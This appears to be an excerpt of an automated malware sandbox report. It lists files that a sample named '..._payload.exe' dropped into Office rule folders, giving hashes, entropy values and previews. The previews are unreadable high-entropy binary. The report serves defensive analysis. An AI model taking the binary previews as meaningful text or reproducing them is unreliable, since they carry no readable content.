                                                                                                      Preview:<?xml..._).9......U.:......[.....Ou.-1]........Y...`.'..n,..Q{.G..l.i........2..U.d..H..8.@..+m5_...]R2p..U.j....^..Yn.._.t..\.92?*G.....J.0.|.....Z$dn.@=/k2O..#.a..... *7B9.'n......]..0B.......~%.3..A.M..U.=..._V....Mvz.r.-..FB..........r..LQTy.= .i..,..R.]..7h.3.X..E2S..q.QY.SF>..!........Z....9.\\.i(.i.(.....h.....r}...s.NU.=7o..3i./Kd'.F}|...7b.....XT..kI...q.?.^.....WB....3.bTqq;..(....RX.\.//...\.m/a..bXRl<..y.).W..j...f.....8......._.....b.,t..`.lP..6..TL.(I.$.-......P^..7...."....G....d..Z/....y..Z.........>i..,.f..Ga5..N..;..-*1..Z.f.{...g.I)..1..P..,\.V#..V...OP|........+...vL...... ....&.b..vZ.^R...P.S'!9....?@V.D.......z%.'.e.}...;]...[..,.....=.w+g..-m...:.R.a...S|..g. .OB... n..1.>u...T.6......@....:.?..?.C..r...0.f|.l.W...'-...0j..U.;fx...i.o......8..8.s.._...&...|..P.f....&FLq....\..a.X....W..q .mL..s.*.j..:..qk.9..8U..g..Z.M.@..N................Q}..0.%.*...jv.-2....h0...Gf.|F'9..v.R ..V.....g.......n......R...H..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704101v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.883246796117255
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:oIo0PBQnL1EFednhsqlcufyMu7kA65Dqmnp4a9t/ZYTfofOzlIs2GXdFtuZ9Av6X:NlpCGFed1c+u7J904uKT8Ps2+NwD
                                                                                                      MD5:F5CBABC4F88D8FD74680522C1F711A19
                                                                                                      SHA1:120F131991372099278D93226ECAA212435DC47A
                                                                                                      SHA-256:4B82C8A577070814A7D6CCAA8CD4A32331DFBECF5F741107F2B45CDF544D409C
                                                                                                      SHA-512:F56BA2D603CF6962B9E8F1A98770CFC09DCF62C0461CDE57E412C31BE0CFD3A75186CD25C8F8D794BCB6A937491D7BA834F341EC8E7953A72FDF7A788E226BE2
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml...x..?.o.;M;}.W.L....0n...p....,|t..0..p+."@Y..U..jw.E....d.6'IBhc ....2AN...\g.;9...W.^V.Yv.R..4../M...84]P.F..~9....[.....}. .$...S...6..Eq|...Z...)..~T`E......'%.4]-x.=H......_........}._...g.....j3Le..&..`V1"....!.i...Aa.Q......F.(..?.A\.SR.....a..... .0.9WE&..........!..x.?[.H...B.mib..........h...g[.4..m......<{I.G.u."1.t.+.N`....I.......d..Q.A...7#.zW_3kZ.........:;08(.f%S.......V,...p..:T..rQ.~.0..cf.J..:...9.?.}.+.@...l`N..CF[.u.62....Rq....r.*b...%.M....i....e..Z.?.>..K..........q.nP4.../...LW..}Q.9...^...9AC......\.4KVs...y...p.N... Tb'....pR../......`.0..^.@Xs..M..Cp.b.....>.r.QQ....L.........(g_.&...#r2%..y.@..H33.O.K.....9..++..v|..........#u....U..P3.*.oi.H.o._Q#qVV...q..%...OL.........y.=.~.....`M.Ze...k00..3h..../...m...4..'X.....aB/>}E.4I...Y..].k.D<B.....wN...d....<lk.D....+.v....m..Nk...W.Gsl..Ya1..D.._.i.g...E...P-[....w..'..k;k..?.4........5Y.QC....._.aS.tH1.R._.....Lfi.}.}..x.....R.*F.c...?.[Lr..........4.7.6.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704150v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1695
                                                                                                      Entropy (8bit):7.8712992774753
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:uNhcL9qqy5tFdsF1kOMqvAjnQuVHvDPicR9DnlwD:uncxqt5tFdsF1kOPvGnNVPDicq
                                                                                                      MD5:6AC5A5B65AFC578E8D4B9BC3ADC79E5B
                                                                                                      SHA1:2A8D21D84D42F13FDAB283256C9C7C504BDD2631
                                                                                                      SHA-256:C5C47EE0B6E5A4CB99EDC17E6CEB905E42049A1F736F6C43F23CD7452A32DDA4
                                                                                                      SHA-512:2317495994BB0B9C0E92FFE73068940D0C2EAFC184E0EBB5F127B5A04015EFD75CC627F0F62DAE4CDD7976E49F6C893490FC22BFE43FAE347A9F0A92B6564FB8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml>.............R7.....J...d..N......8.."T&=0c..e..JIH...+...I.}.....'..z..1...".v..H-.`Gs..g%5....`...j.u....K..n:..5.1.?...L....=..._.)..\.................7&=%+......V.mp..]f....H...C.B.;>...i.A:X.p......C..s..Z6d...\..lldP.....Z.k...D..t..%*..o._S...f.+..g.z..uM.l.@..##....a..... J.....E..`...,..W.g.....Bzc...eG......H.R.^.n...8.XZ.7E...c..?0...8..:A....Qox..........20..AG.EHMu...Am.H.O..k%..m_..eh..I.W.5....c.1.... .... .Nd...._G...V...X..[.....C...c.q..m.8...)'...G.O1.w......LY.!L..A.....~......DR....y.A]x....6..7/.,.T....h..:`K_..P.PP..^]r.n....o.T.o+......3)p..iIpS.@...v.IoK`..`.`...'..].T @0."...su..;.!-......^5.dJJ\f5..!f\..A`.l...5.]Za.....Vh>/;...Y..x.Q@aq'.{.P).:nR.(v.D..n9...Z.A.'EBd.M..ku..Pw1....B.s.,.]`....]...%P........^l..e.`"....l.g.[A3K.|..1....v.|...wIU ...v.![.....U.......^............HA(J......<.p....d9_b..E.+.........3=b..m"p=...kp..g..k3.. t4L|3.m..b...".h.......%+!V......Qy4..J~8'`....@.F....b....U.V..._..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704151v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1732
                                                                                                      Entropy (8bit):7.893219292706174
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:dFZQCyE+Q9YMr53VNvyJMHPMbhJjxSqDKbdyPhLyvv5EN1KLP9PMNvyiK5w3mIf4:dFvn7VF1eDJ0qDSsLc21YcvxhwD
                                                                                                      MD5:9AFDCCB024610145ABFF435BD1A0C240
                                                                                                      SHA1:79D8632C8BB778A6CAFBAE8C3EEB4D85E2E7F3E7
                                                                                                      SHA-256:45D2E43A9CE96F55121D2A7A2F940AB0068A6E9177830D5AFB940E65D2B30008
                                                                                                      SHA-512:1EA0705C3565D3A64E8239573222ED356F4C64684F5E3C3BB0CF53F426D854FDB844927AAF310A84F7990841935C1DA04CA484AEFC50869B9A9FD3743E1E35DC
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmll#Fm:N...K..H..O.Z...U3.F....+..}hQ$...].D._.o..K.p.n...,.......D...sj.....Wa.RZ.*.6.8|.&}..c.<.q...........H+~.]_.WL-......Y8......_M..QD...N..i1..H.......-O.Uh....a../6...5....{..'.W.O...j..zD.[u..|:]..9%>ZZ5..".=.%`:..z.....va.. .lg.MT|@N.Q...Ax...K..Cs$%.+.E..*.W.`KuW.5S1.. ..[|)N.DC.]...=..fhum..x-u..A...e....93[...{.|\.5.....F...D..8..^.+.......vzRXR..m.y.I.,.L.mb.h...v.....2...m....$..3...AB....x..OL}oY..(gc.......*._...k...;.x.6-..:..y;t?...NI4.....B........q........t..\.&........I..j......3...kM...;....{1...K.V.\.$.]<.A.....'.A&.]&...!..2.......v..U?.u&.%_............B`.?...C.|.yI.;WGn.mO}P..'.N..1..?D..P.......;...PK...w.}..2`.9"{..@.... .A0.X......j..@.R.J...d`..t...k*GxF..y...R..,.Y#.I.....!.*..."...>o..i...[.XZ}.AP...+..22...+.I.@.....`..R...?...(F....&L.]).Y..".d.......]b;B.2.:..@..+.9......t..,.Y..,...o.`l.w...]..O*...]:....T..../~_....6.&....`.w.JV....h[.....m.f.E.Q....4..[..1Q.k!.....,L+...a.l:..2@.k$..=.F."Z.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704200v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1713
                                                                                                      Entropy (8bit):7.895536003157032
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:DBmrHXSlSQ+qEiaXAPpgG0hGaoztfRPWl7aJU2zeP2D+0wD:DBmGr+hiaXABVsGaoztfRm2/eP2D+N
                                                                                                      MD5:8B57C07E5E3D04AB099FF9E0402A4D43
                                                                                                      SHA1:175624B87FE97FE976FBCB4FC82C1B12F9915DA3
                                                                                                      SHA-256:03BE9249D29D4E3920BEDBAAE475D7A272081B24E4CA26C65100D8CF62CE8FFE
                                                                                                      SHA-512:4D716E52323A950704C46047CB38913114A80A6EAF51E5E0F97DF0435825B33CF6025F2691B03C9DAB2BC40ED599103E62732C1710989287540EFB138A7287B3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml03..L...n1....ag7$..........M1>.Q.cG.(..jp......N...3.2.>.^Q|...Fg|..v./,.z|.,%..6..:..._....m.z...eb...%.60..to.......G.oj.g....x.D......r...bE@..jw9...i...`*...Z...?.....[....@j0..A'..@).....).A.._..3.... V$....(....s....ei.xn...X..S}.H|.1.t.P.:..T...?.Y. 8.WA..f..]G..F4bZO|.........../V\..Q.(.........Jq....;..........,.-.i........u4.B..OR..H...;....(....l.^.x:..G.;?G.A.cU..?|.=}.m...............!..$.!.....l....]7.......C..4......7...@-.z.k.....M.U..]<....Z...?.L.#oi.)..P?N(.....a..../t.d...?u.....kk.;..Sv.1...$..I...2%....G....<....t..,/....Lw.V..w..p...Ea..lE.....X.6..P..q...:Y....A.|-k.^....a.3..../...v\'.h..T.Y...!...@fS.\{.#.....1Q..2..N..K}....aj....a.*3..A..n....R.k)K...F..2.....^..i.L/.....w..(.c.....n..X.b.Rx.L4.R^.Y#.....0.%...w....@R.b.....U|....'2.:..M....i.h.RE/....7.t]r..Jsc...F.Q..?..f.<.Z......I...|! B,.u..V._...t.hI*,.L#~.~..[..OJ..`.wl..C.A..Y#...."n.....V:9.y.. T.....hX..W/......p.v.WqTPr....6`...`..8

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule704201v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1750
                                                                                                      Entropy (8bit):7.902427061108246
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:nBpGhMuJHGJcd0oQjgvYQH2zANijcNV0TtnKFSgNlMwD:BpGhPJmJcetgHbNiWutnKFzNlV
                                                                                                      MD5:D2B25DCA4E56BF9B933A895128E5E5FB
                                                                                                      SHA1:FF52F5B9C4DF6F16C714066DFD6BBB42A016E681
                                                                                                      SHA-256:F6ED1E30727359EA23B1A3305B2301D947CB37F587988F78C97128ED95732919
                                                                                                      SHA-512:94818A86D490AC5503F1A3DE3356D4F390BC19903AAD6CC11836CF0949BA7413AAEA01559F8A1183B50A67FB9F03A62ABED13258200FCFF5B8FFAE973FB497A8
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.y8,$..tH..].X.u...R.~.T.?....+...~\.m.e%."27[M'gy...@i...#>Y. ..nc...ij...[:.bNq.........K{.......;<......_S...`...... ...v.0.}....Q....v...H.....bN..y)....t..+..9C...x....g......?....w*8.oF.....l.2..p^.`..L.K0..kX.O.....T...5..V..........bL..7~.1...Y!@.".....z..h....4.o....m.........q.!~j....._..A.......w..M./.i..n.t.........i.I.6._.F__s6..K)~S.2 ..<...HW:..}.1.U.....s..P.Z.m!b..5)%..0.......{......(...E.]O....'...Zu..UO8.z..W._..9p...J.e.i...z.G....U..P..../U..RlB}._h.......&]...[am..sLF.S+..V..=.A.h...K.eJ..:.P.P.....{.$.-.........!.......|.g....C.>...-.....G...B..G2.M..4@...@....?F....+...........m.{!,..JaaV..g(....=N7..a....F.....[.u.Cm..l.o.SB.0.3....{....6..k\..!lzV.O.......*........@.y.....J43F.=..o.i....Z}..0>................{......;......5...R.....3.Z.'.g........;....._x..$C^E..T&..........k......FW]:5p..I.:..:....7*.z..d.$4hL..*.`.....4%..K..EWC.{..R.7m/.I7f.7Hl..x...Q.o...#."...Kl.M.d...w.A=..i.,.....)y.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officec2rclient.exe_Rules\rule90401v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1583
                                                                                                      Entropy (8bit):7.89135142069534
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:w4zfFQzQmOr56A3xGDBP0oBl3oPmYEr1w5jtWieJczbKJTN+yL7v6bD:wwfFQz5OHADBsal3oOYEcLVivwD
                                                                                                      MD5:A542597DDEA47A9A4704B6F22E2D374D
                                                                                                      SHA1:A20742B3F348092E66FD2992040337407FE576F2
                                                                                                      SHA-256:FDB10FA788F180B8056BF108F617103A45BD9EEC75C33F1A01293F2D5FC7F86C
                                                                                                      SHA-512:D306B7E281493240403EB70B121CC5888936EFBF784DEBCC3C156AC6C30DF05A4D89CD4BF84F18EEA0BC3D8B65C259BD1ED969028515DB2F09E4376929D637FD
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..6s.w.]x.g...a.t...L.I. :-O.\f......$.%o&.J."..q..V.il!....2g:...Ls....uy.}.......F....U.a..<...]...L....#h..Z.PEk...(.r.I..K..Hk}n...!......t....Js v.0..1.\.AK^......?.......d.....C......`.b!!.+&.3....~.<h.Ax..%ov(k..&.....7.sm.. w1wc Q.q..8...S.[K..eW....h..5....t...,.......VX.7....+k<..g.p........6..d.Jj.5..H...B....qu.4........z...3[...S.*WB.....KG.V...Z.t.By...)...+.*......d+._.%.RE.e......h/..I7!w...[L....... ........."vk..z."uB....67y.....{.p.....9a..F3..Bp.....-.x...................{H.+9.H...\Q. ..(.V%`.y.....IMM..[.M.*k.......@%}..?...?..q..e.\.J.:....(.Zz.....>......Wc..n....<.A..}....:..)...n...$.G$.vz.....Q...4,.lS...(.{..E_..x.E.....o.D.k.$B{D.@....{.I..f..XG.o...R&.Z*..\S.|,+sX-`uct.r.yhd..ae.V1'.`.D.^..4F.<...(...|...4...T...1.p..<.!..>...0*..N.z..~.P..qu...s.fG<...+S.... B...I.g......W#Mb.....Fh).....d..v..p..."@.g+....2...Sz..+....C./x..'.v{&...#-'@{T}b.0.\.l......=...#..go...Y..m..:=c....5].|...C..P.=../\x

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):361051
                                                                                                      Entropy (8bit):6.5143154354738675
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3072:rxnkF2X8WwCKdCdRspsSoOEWV2+pR+am32AuLwUwz+oVhAlsZLS4Zq4:raFbPCdapjpRlUamG/806ysY4
                                                                                                      MD5:951CA16A73D53B0153FEAA4EDD14C46A
                                                                                                      SHA1:CB6393D6DF1A1F0727265FE907BA2A32CA16E90C
                                                                                                      SHA-256:B07B8B59E7B4633EF3E3A6483ECA75D979A8BC54075FAF842CEC894B235DB25A
                                                                                                      SHA-512:9559FBA1A10B69FC90EC8C0BAEB7C7D89E2992E2754E7D1DE1086FE9CB2CA18AE4D9C53A2BA79E34377A0836056C8F562C359163288F3A94545453E1CCAEBB67
                                                                                                      Malicious:false
                                                                                                      Preview:<Rule..lu...Q...yK{....pf:..-1c9..........bp....V.;...e*X.K.0...9......;Y....-7..H..F.|Gr.r....k..xX.)........L.?...\.bL...........`,.....|..i#..&..E]*.#.U...P8..XX.....U...C8..m*.Z..=......B..D<..1....h.*..,{..3...e.$....L........;..........~V.#./@.2..l...A..wB....U...xa..k.8.T.S_._..i!<vn..1.<..0...,..}....df..Z{.S..65..i.96C4>;....D.F\..o...K@.Z.|.....+......l5..N.....N;I...)."AF.m.N....%.!N...F..2....g..c..q.TU.=,\.....d.!.....qQwIh......."..Nh.+.H*..._c"..T...W...P..'...!n:./..Y.uJ...Fn...IZ.h.........M.p.9u.E#p.....\B~.p`.->...xJ.......E...w..y> .O9.~...-..y.-.i..kRv<..bz......s...j.*.}.........w.;~.;..d/nW.!....\...M.O...X.%......*.....c....t.*...JL.....47.f,Y...._.........5...C..$.qq.J.n".].W.*3...........Q..l.G.c.f3......oNZ...\.fj......F.8..7..f.8,.8H......t.?Sr.y.L.@Z=.F.....B...-...\.Y......!{.....~.[...W....nO.nA......N....{..l....Z...~..M..;..h72_...Q.....Z_I.G...me...E...5L Z..Q...-..%.k.<(.K~p......6^....Y]0.......AIR..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule1000v5.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1928
                                                                                                      Entropy (8bit):7.899669955499691
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:O2HHFiapIVrUyPFMJ9FRoLqd+MoUl20l4mtpjpvp3wD:BFiaGuyPFMzFjdr4Epjpv6
                                                                                                      MD5:9A43F6240D36094F97F6C2B632305DA5
                                                                                                      SHA1:1E3BDDBC14EBFFA0F99946A3F286356D49048602
                                                                                                      SHA-256:460D78FCDE53F12B8BA42494AE8D670A57C7E62A0D847C1E5E6FA19686AAFBA1
                                                                                                      SHA-512:E49F6E2438EB5F9CF1D1354E301FD318B89B700D53A755E6715B6AD47B93551AFC798EC05AB0C1694AB258701624DD57D9B219EE4D4A6C08DF00E762E31825D3
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml.L.i..hO...I..{q....A2.R.u{p..mY..{%,..$....z.|( ]d.f...`..E......>.m.3(|..Vy...0Z..^.....U\...lv....>3.....It..+..l.....I....N..L7=...u.D{JH.Hb..d6.......[.8|...)8I.t..M..BU..q..w..3x..U....ij.k}...t.5Ow..!..V0..Q4i...G.P*.=....L..".r.:..D....B..........sR..#.u.:..5.n.....S..$Rv..Z..B........5+O|.5g.+..m3......ME R.F..vp..WJ..q...jBS&e.....Y+.[&<..U.......f...i.2.p.I.....F.R.........nO_.q8.@a...5.@l.>.hC.k....0.....n...a.t.Mc.~.".@.....n..v8/..T....of..hx{.Y.E.....J.7. ....4d...`Vm.B....z..8q..{.d........\.d@S.W.....-R4..d..)..B....{.......E.o<..p.v.../+@`..S='.OL.kO#..#.:.V...Z.B.+.k;.>t.j`...W........"...6.]...].Ne/..i.U..0...F..A.Fd....=._._W..2;.0N.:T.!5..2..'.+......4+vN.......jX.....?)..6..#.;R..{.R..=;..5....jDPF..v..(G.....+.....y..p...@2.+...hj)Y.L...BUL*W.>.....t.i9s.MJ..7.....o..f........c..'...H].~...yFF....\.k.p...........iU.(&%...0..'.........7G=...J:}p..VJ..>..RaUi7~..Cw.......^.G.......1..d.x......%qj.B.....-..f.^C.q....[+

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10450v3.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1387
                                                                                                      Entropy (8bit):7.8358165724363245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ZviYW1Tvuv5Akx06nMCsxr47FUMLEaDzHBJH7wrb1N6cGmHMSbhAbv6bD:Zvi91yxpMJ87mlaJH67GmPbhqwD
                                                                                                      MD5:6E7648E09D4E36DE47BBD34EEA16A98B
                                                                                                      SHA1:3E0957BCA37C947CE608D402AADE98BA908D39EE
                                                                                                      SHA-256:9A5979770386E2058EB72201A0806A64329EE461FBA62905D03E805216859338
                                                                                                      SHA-512:82383D37600C1DA6481EEEACA157AD22B11AD0BFA11BD87F0A54507952C7581C5F9219AB4B9F86FDF45C0148B7FD9D580503CB9F0AE22A03103DCE1F58786871
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlil..........3....v..T.....v.D.....8..4._.W...]..G....:....^. <].K.+L.}.v....*..G0.!)[}:.^9.x.l.OEA/..U?]i....j[..S...;.I$.M<.2-r...h:..I...........5...zu..Z.i.v..wJ..%...o*...Ee.@f..x..Pcr^..y.....|..dHL...E..3...?. HD...{`U.-......q..7B.....@.1S.Tt..A<...w..R...f....4./.0r......<!..m.....0...;.=....R..)...}e+..A.Dwr..y-...4.].........F(...BKC...Ah.t4.....~...7......).-...A..x(T{/.9...H.w.^.."..........Z[.C:WL7k%.%.b..s+@.6.5A.2JN..D......b.v.|.......![...>&~."..B%....9.m....!._..d$.e..,$..`.H|6ci....mb..i.*D..t.ez*lcY-.F......W....Y.c`.P..d...l...o.<.(..t1......$.e.<.;+7...g..qJ...$..I.B..6.-s.E...x4.w...#.#.?0..e...c.FW.y.....h..Dbf.W..%..:..-. n....v. .Y...,.Z..E..LmS..P..H....N..eRQ..z..l.h...iD..=...n.L.'."9..:.w...z.4CXc#.e..s.B.'w@ia.....>+. *...g..O.N\L4..t..S.K.fT....X...3....t._...~.....&/.......fhR.....FU>x..".J('H.....;.#...Yp........(..b..T.D...iwE.).j..e...._B..g{..:...b..O..v%W}..ge....e.M.n..5.........%1

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10625v0.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3024
                                                                                                      Entropy (8bit):7.943390321556941
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:c7//wovIQFlScN4iRloONC17zJkIlrFU1n6hPyMfcHdx4FHnCJZUMnj/nwD:4nZIVQ4x7zJDFU1nC6ecHdGnkTw
                                                                                                      MD5:184D33B1999B3B140E39EDE96FD45BC4
                                                                                                      SHA1:82F4F08522455450BD9C4B495FC72896774D0E92
                                                                                                      SHA-256:D6B4FF6E8BFC7FD1ECD66E7B9F26C03FEC9C14923721828DA1EA2BED13DE5DD2
                                                                                                      SHA-512:6B85CE01089600D98391ACBFDCCED03EBE835A40B0E191AD9476C2271990816258FC7E7B0747318B342BD479E0791F762CB77DE5B916362B9C639A5100A1335A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xmlO.%....H:.`..3..}. ....x....#..<1.[...%....i.'h....Z..":.A.~.[....K.%.z..L...9.._. .....O.[..L.W6)@...u....J.1..I.1..6..m8....6i.q.-%.n.0dP.$..f6R..M..wD"-......3.>..z.R.r.dU...Q\\!.2.N.z.....J.P.lmg.R8..s..j5....}h..9&...PI../..&.3.Kuf...{.........m.m..*...Vd....#....w..kA4.KF.&...j..-..K!......q...1....8..a....k....R.y.O..AP.....S.m.3...C~OKQJ..=I..Np.:.......:...@... ..+..W|..Gn.M.../..8p.....(...$.eC.....4.>.Z,m..g..wiE.e&...}W.b..RRI.7 .3....^.....Z.,...Z..EW|..o...[..Z!............F..:......28....4....5 w.wsL....).gZ..._nM.....#'.G....]Q..].-.....c.........:....#...=.......m.>..^U~O....&.(....3-6.9....tH.x..Y..6..^w................<R.n..........a.>wr.........55;..Qh.U......*u....../.w..........q...-..nq.hp.F.O..rH.......y.j,_..D.;qN...:m2......6..#'..*.?C..+'.t..u.U.K.]..3..~8..d....u..D.mc@>.............r...~.v..%..'.&.B.........N.......'.+M....j.;i.FL.Eo....C..rV7F.T...C....F....5...].F....x..9&....!_......Flr[z..&E5

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10626v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1675
                                                                                                      Entropy (8bit):7.8789257733024245
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:WOsTeSZkXVYsEMs0AM2pHhPfPz5yWrwe7CewD:WOsTeSYY7LMUHjwoc
                                                                                                      MD5:6B0A7C53A472B76F74055F805AD440BF
                                                                                                      SHA1:0A2234567DDFA47457253E1FA7D2A9E6069EFDC8
                                                                                                      SHA-256:58A03E0A05558515824F25860E56C633F580AC3AE24578971D80B682AA3B0FC5
                                                                                                      SHA-512:4A00C3575D0F5372632900651632B0449D728BC82CAA86169A3C966AFD1AC83CDEA4AFCFCC407289D4D75D891103806FAA0CF0C0E63C888ED91D91121578097A
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml..MH..Le.O..R...[..8.....>I=... .Fj..i....Z......}.l&a.....8I....5..FylQ..n.s.X.}.UL..(.A..;}..r..|.C....p|{T.B.RKF..F.L..8Z.......cD....( ...(.Y.y.......,...;."...?...)..H.9%...Om.6..YXJ.H&v../&.......(.....soRh.....e.0[..dN8.....'O.%.LG.=T.~O..f..3.".Md..X.D.;#XE..d.m..0p* .._... ........z......V.....!.'x........qWy......h.ND@...~..H,.{iU7.........P.....)[|.54.....$...8>..%.AEr9-....>g....$Pk...................@.{.|V.h7...e.U.g....y..3.4..S....[..f.7..M.h.q..8O.....Fu..Q.4.B.V.=E>z.:....m.uoW?J\.P3......L.D6.l#ZVU....-...Mi(5.$....;.$.R.~../.....y.+1.<..V.....a..'.-.=.a!.#x....W..o.C..FL....3.=..I..(..D.,..z...QC....;.....1b..c/.Ez).(.O..: ...]....O. .F...f....L.m..L.;.....p..%...X ...w.)...v'.A.....?.,Y.k..._1.......y.hh.'A...!..xjz...m...=@y....90.9.o.b......#[...=.A..d.~=4B..a.I??.T.B..n....."~...:@.G.1=.....`....h.0....s..:4...a'wb]..^..1....................$$...gZi.^0GW...aH7b.1G... E...C.:.6/.. g.M..^,.....l.s....tB....X

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule10627v1.xml

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2113
                                                                                                      Entropy (8bit):7.9033157234907305
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:gUKnKEL769WsDlPveXZPThtJM7W9ExTbfVBngcXS1YKDZtJkREwD:gUSKK8DlPvAhOxTxBgcpKVnk/
                                                                                                      MD5:4775B2ADF99C828AAB0158C316A55C86
                                                                                                      SHA1:0F0E37F52D6FFA585B51D3037502C09BDC540421
                                                                                                      SHA-256:F68B4AC43610E71B2C9F952AB5A7638B1A5A9CB7921BBBAFC05D52C436E71BF5
                                                                                                      SHA-512:45C0E631E4DE209FF560B1D4AD73E2AF13CECF340429A35B8B0F83D8704B03B7BDD1194748F044D44EFBCA7124A66DC92BEBB0643D9758E295E3A050788A2E79
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml....C*.1........O{..."RV...SI..z."..Y.E....p.L.>8=....3.{.......)..P...{S:...7........Eir..2...H.....&.....9.p.y/.0...:Qo...W<E'<.l.(2..m|S|.?R2,.#..x..lh.]3.n./.k...q....5.-d.-.k..<.}...[].x..*.`.i.t/.......`.9B...\........<[.4.l..$#....b....(q...!....T0.p..hHr.r.5..fc0.Q......u..min..bKV.;.TzD..\.......J....L.........,.-%-8..^.9..O.B2..95.d..`e..r.g...(hI.......?\~..."...[.P...I..7.R...X7x...., .G.S.6X..#..`...%......WR@R.t)....![RTPS..G..".E..eB..W...E.......GLi..,..).....b..QX..t.....12.<%_..x....&e..:......E.H.\.E....:!....U...'+.....F{.@......: .k_..:.1|U.c.mK....I....x.....@.../..5.".V..P.I...[......W....mY.L..F.....([...e..DLj.+...}.z.;...:.hE.W..d......t.Z.._`s.2...^..:jc...%....b...7Y*>.X.d]S....".D33......J....^....}=..l..ki...>[...#.P.oj....J.s)......%...dv.Y.G4..t.<.Pu`..a.\...j...y.J.^.....+.0#te....Y......!.......N..jG.$Xt..ZO.=.....l;...@3...H.v....&..@.%X.*mq^.H.}..Kb..Wgn..(. .?."}.G.. 2'...3.....:..8.~....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule702601v1.xml

                                                                                                      Download File
